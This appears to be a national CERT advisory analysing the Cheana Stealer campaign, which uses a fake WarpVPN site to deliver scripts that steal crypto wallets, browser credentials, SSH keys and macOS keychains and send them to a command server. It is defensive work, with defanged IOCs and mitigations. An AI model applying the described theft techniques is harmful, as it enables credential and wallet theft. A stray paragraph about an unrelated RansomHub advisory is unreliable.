1.0 Introduction
Recently, Cybersecurity researchers identified a sophisticated phishing campaign leveraging the “Cheana Stealer” malware, which has been distributed via a VPN phishing site. This attack is notable for its targeting of users across various operating systems including Windows, Linux, and macOS. The threat actor has created separate stealer binaries for each operating system, using a deceptive site that mimics the legitimate “WarpVPN” service.
Figure 1: Phishing site
The Federal Bureau of Investigation (FBI), together with the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS), has released a joint advisory to share RansomHub ransomware IOCs and TTP. The IOCs and TTP are essential for organisations and businesses to mitigate RansomHub ransomware.
2.0 Impact
By downloading and executing the VPN application, an attacker using the stealer extracts various sensitive data from the victim’s machine.
3.0 Affect system
- Windows
- Linux
- macOS
4.0 Targets
- Cryptocurrency related browser extensions
- Standalone crypto wallets
- Stored browser passwords
- Browser login data
- Cookies
- SSH keys
- macOS passwords
- Keychain
5.0 Technical Details
5.1 Spreading Mechanism
A Telegram channel connected to this campaign has been identified, with the phishing website mentioned in the channel's bio. This channel, which has over 54,000 subscribers, is instrumental in spreading malicious content.
Figure 2: Telegram Channel
This Telegram channel has been active since at least 2018 and has experienced various profile updates over time, as depicted in the figure below. Significantly, the phishing site was incorporated into its bio in 2021.
Figure 3: Telegram Profile Changes
5.2 Execution Across Different Platforms
5.2.1 Windows
The attacker uses PowerShell commands to conduct the attack. They first employ ‘Invoke-WebRequest’ to retrieve the “install.bat” file from “hxxps://warpvpn[.]net”. After the file is downloaded, the ‘Start-Process’ command is used to open a new ‘cmd.exe’ instance, with ‘install.bat’ provided as an argument to execute the batch file. This approach ensures that the ‘install.bat’ script runs effectively as part of the attack. These commands will operate correctly only within a PowerShell environment, not in the Command Prompt.
Figure 4: Installation instructions for Windows
The “install.bat” script performs the following things:
- Verify if Python is installed silently using the command “python –version >nul 2>&1”. If Python is not installed, download and extract the “python-3.11.3-embed-amd64.zip” from python.org.
- Check if “pip” is installed. If not, download and install it using the ‘get-pip.py’ script from “hxxps[:]//bootstrap.pypa[.]io/get-pip.py”
- Determine if “virtualenv” is installed. If missing, install “virtualenv” using pip.
- Create a virtual environment and activate it using “call venv\Scripts\activate”.
- Download and install the “hclockify-win” package from “hxxps://ganache.live/media/attachments/hclockify-win.zip”, which masquerades as a legitimate Python “clockify” module
- Use “pip” to install all necessary dependencies for “hclockify-win”.
- Run the “main.py” script from the “hclockify-win” package.
- Use a “goto” statement to invoke a lure function that installs the legitimate Cloudflare application, thereby disguising the malicious intent.
Figure 5: Content of Install.bat
5.2.1.1 Targeting Browser Extensions
The Python package “hclockify-win” contains a module called “ganache.helperwd” that inspects various Chromium-based browsers, such as Chrome, Brave, Opera, and Microsoft Edge, for cryptocurrency wallet extensions like Trust Wallet, TronLink, Coinbase, Crypto.com, Nami, and Solana. When these extensions are found, the module compresses their directories into a zip file and transmits the data to the threat actor’s command and control (C&C) server via a POST request.
Figure 6: Targets Browser Extension
By targeting these extensions, the threat actors aim to steal cryptocurrency wallet data, including private keys, recovery phrases, and transaction details. This could potentially give them unauthorized access to the victim’s digital assets, which can then be further exploited or sold on cybercrime forums.
After examining various browsers for cryptocurrency wallet extensions, the module moves on to scan all Firefox profiles. It focuses on the prefs.js file to find the unique ID associated with MetaMask by searching for webextension@metamask.io. Once this unique ID is found, the module uses it to locate MetaMask’s backend data file at “b0kwoimz.default-release\storage\default\moz-extension+++7f784e52-eabb-4316-8e36-850ac47f0760^userContextId=4294967295”.
The script then compresses this data into a zip file and sends it to the threat actors' server through a POST request, ensuring the continuous exfiltration of data.
Figure 7: Targets Firefox’s MetaMask extension
5.2.1.2 Targeting Crypto Wallets
The malicious Python module scans the system for installed cryptocurrency wallets, detecting the installation directories for popular crypto wallets like Bitcoin, Monero, and Dashcore. Once these directories are identified, the module compresses the wallet contents into a zip file and then uploads it to the threat actors' command and control (C&C) server via a POST request.
Figure 8: Targets Crypto Wallets
5.2.1.3 Targeting Browser Passwords
The malicious Python module focuses on browser passwords stored in an SQLite database named “Login Data.” For Chromium-based browsers, the script first lists and retrieves all file names from the “Browser-name\User Data\” directory. It then targets the “Local State” file, which contains the encrypted key needed for decryption. The script uses the “CryptUnprotectData()” function to decrypt this key. With the decrypted key, the script can then decrypt the “Login Data” file, which holds all user credentials. This procedure enables the attackers to access and exfiltrate saved passwords from the affected browsers.
Figure 9: Targets Browsers Passwords
For non-Chromium-based browsers like Firefox, the TA employs a module called “ganache.fflg” which is capable of extracting credentials across different platforms, including Windows, Linux, and Mac. In our scenario, the focus is on Windows. The module systematically iterates through all Firefox profiles to collect key files such as “prefs.js”,“logins.json”, and, as a fallback for older versions, “signons.sqlite”. It then leverages the Network Security Services (NSS) library nss3.dll to decrypt and extract the browser credentials in plain text. Once decrypted, the decrypted credentials are exfiltrated from the victim’s machine to the TAs command and control (C&C) server.
Figure 10: Targeting Firefox Browser
Figure 11: nss utility for credential decryption
5.3 Linux/Ubuntu
For Linux, the TA crafted a curl command to download the “install-linux.sh” script from ‘hxxps://warpvpn.net’.
Figure 12: Installation Instruction for Linux
The script “install-linux.sh” initially tries to obtain a unique ID from the “warpvpn” configuration file found at “~/HOME/.config/warpvpn”. If this file is not present, the script sends a POST request to the server with the victim’s username, operating system, and the phishing source to receive a unique ID. This ID is then included in all future POST requests along with the stolen data from the victim’s system.
Figure 13: Unique ID
The “install-linux.sh” script consists of two primary parts: a component that collects sensitive browser data and a cryptocurrency stealer, along with a function that mimics the genuine Cloudflare Warp application installer.
This Linux module replicates the Python-based stealing techniques seen on Windows systems, targeting browser extensions and cryptocurrency wallets such as Bitcoin and Monero. However, it incorporates some distinct elements for Linux. The bash script is designed to extract Login Data and Cookies files from the victim’s system and transmit them to the command and control (C&C) server. Additionally, it searches for and uploads SSH keys from the “/.ssh” directory, as illustrated in the figure below. This thorough approach significantly enhances the attacker’s ability to gain and maintain unauthorized access to the compromised system.
Figure 14: Content of install-linux.sh
5.4 MacOS
For MacOS, the TA provides similar curl command to download “install.sh” and using default shell “sh” to execute the downloaded script.
Figure 15: Install Instruction for MacOS
5.4.1 Targeting MacOS Password
The script deceives users into entering their credentials by imitating a standard system prompt that typically appears during the installation of a new application, making it seem like a legitimate request. After the user inputs their password, the script uses the ‘dscl . -authonly’ command to verify the credentials. If the validation is successful and no errors are encountered, the credentials, along with data from the “/Library/Keychains” folder, are sent to the attacker’s command and control (C&C) server via a ‘curl’ POST request. If the validation fails, the script repeatedly asks the user to re-enter their credentials, continuing this cycle until it is successful.
Figure 16: MacOS password exfiltration
The threat actor sought to collect information similar to what was seen in earlier Linux cases but with some key differences in the attack's scope. Beyond targeting well-known cryptocurrency wallets such as Bitcoin and Monero, the threat actor also focuses on a wider array of crypto wallets, including Electrum, Exodus, DashCore, and Guarda. Additionally, the script searches for and exfiltrates saved SSH keys from the `/.ssh` directory.
Figure 17: install.sh (Crypto wallet exfiltration)
5.5 Fake Message and WrapVPN Installation
During the theft operation, the threat actor uses a deceptive tactic by showing a fake “in-progress” message. After successfully exfiltrating the data, the script then downloads and installs the legitimate Cloudflare Warp application on the victim’s machine.
Figure 18: Fake Message and Legitimate VPN Installation
5.6 Exfiltration over HTTPS
Prior to exfiltrating the data, the threat actor organizes the stolen files into ZIP archives, categorizing them by data type and assigning unique names to each archive. These archives are then sent to the attacker’s Command and Control (C&C) server through a POST request to “hxxps://ganache.live/api/v1/attachment”. The transmission occurs over port 443, enabling the data to be securely delivered under the cover of legitimate HTTPS traffic.
Figure 19: Exfiltration over HTTPS
The threat actor uses a Django Rest Framework-based interface to oversee and review the exfiltrated data. This arrangement offers a well-organized and accessible method for managing and analyzing the stolen information, facilitating the effective exploitation of the compromised data.
Figure 20: Attacker’s Login
6.0 Indicators of Compromised (IOCs)
| 70f08497d7a9e6a8e5f2dd3683a20563d20668e1c78df636ff1e36a014c9d493 | ||
| acf807def82c4b56752a9fa9b081dbb37ba9cc9f6e1c522568ff502b6b49b6db | ||
| 48964c11fcbefd6508164239866c94b55ca2798e9745671c37447ad0a6f3e1c4 | ||
| d3ece8616d0dd8244666af574cc2475d947180ed240f49b1a6e61443a896f65d | ||
| 3ef838502663c167f5c502585e810ffae3e03152b3f82544b813389c19a33dce | ||
| ac4aeab3952f6ca960cbd48c3123f09a68f50818f9bdf35c9d811570893fa102 | ||
| 6a68e95ae67aa8c61bd74ecf5f57f98fbdc0bbe0489ae71b7c8732edf49ac3a9 | ||
| c044b1a36249f6fe7219e6c48270d9927bf359110ff3583129dcbdff809f2d2d | ||
| ba8058b704a55e50c24383a765fd74b38d7dbbf8546c4f179266c265403174b8 | ||
| warpvpn.net | ||
| hxxps://ganache.live |
7.0 Mitre Att&ck Techniques
| Initial Access (TA0001) | Phishing (T1566) | This malware reaches users via VPN phishing sites. |
| Execution (TA0002) | Windows Command Shell (T1059.003) | cmd.exe is used to run commands |
| Execution (TA0002) | PowerShell (T1059.001) | Invoke-WebRequest is used for downloading batch files |
| Execution (TA0002) | Python (T1059.006) | Python stealer is used for targeting windows users |
| Execution (TA0002) | User Execution (T1204) | User is instructed to execute the commands |
| Credential Access (TA0006) | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Retrieves passwords from Login Data |
| Credential Access (TA0006) | Credentials from Password Stores:?Keychain (T1555.001) | Attempts to exfiltrate Keychains from MacOS system |
| Credential Access (TA0006) | Steal Web Session Cookie (T1539) | Steals browser cookies |
| Collection (TA0009), Credential Access (TA0006) | Input Capture:?GUI Input Capture (T1056.002) | Shows command window to enter password on MacOS |
| Credential Access (TA0006) | Unsecured Credentials:?Private Keys (T1552.004) | Tried to exfiltrate ssh keys |
| Collection (TA0009) | Archive via Utility (T1560.001) | Zip utility is used to compress the data before exfiltration |
| Collection (TA0009) | Archive via Library (T1560.002) | Zip library is used to compress the data before exfiltration |
| Exfiltration (TA0010 | Exfiltration Over C2 Channel (T1041) | Exfiltration Over C2 Channel |
8.0 Recommendation
CyberSecurity Malaysia encourages users and administrators to review the following cyber security best practices and apply the necessary updates.
Review the Indicators of Compromise (IOCs) and implement the necessary security measures.
- Download Software Only from Reputable Sources: Always verify the legitimacy of any VPN or software prior to downloading.
- Recognize Phishing Attempts: Stay informed about common phishing tactics. Awareness campaigns can help users identify potential scams.
- Advanced Endpoint Protection: Employ advanced security solutions to detect and block malicious scripts. Ensure these tools are updated frequently.
- Monitor Network Traffic: Use security tools to monitor and prevent communication with known malicious C&C servers.
- Enable Multi-Factor Authentication (MFA): Implement MFA to add an additional layer of security, reducing the impact of compromised credentials.
- Incident Response Plan: Develop and regularly update an incident response plan to ensure swift action against potential malware infections
Kindly refer to the following URL: https://cyble.com/blog/new-cheana-stealer-targets-vpn-user/?__hstc=202258190.a25d22137b745cd14ecf20f735f0e4b9.1724825568337.17248
Generally, we advise users of this device to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.
For further enquiries, please contact Cyber999 through the following channels:
E-mail: cyber999[at]cybersecurity.my
Phone: 1-300-88-2999 (monitored during business hours)
Mobile: +60 19 2665850 (24x7 call incident reporting)
Business Hours: Mon - Fri 08:30 -17:30 MYT
Web: https://www.mycert.org.my
9.0 References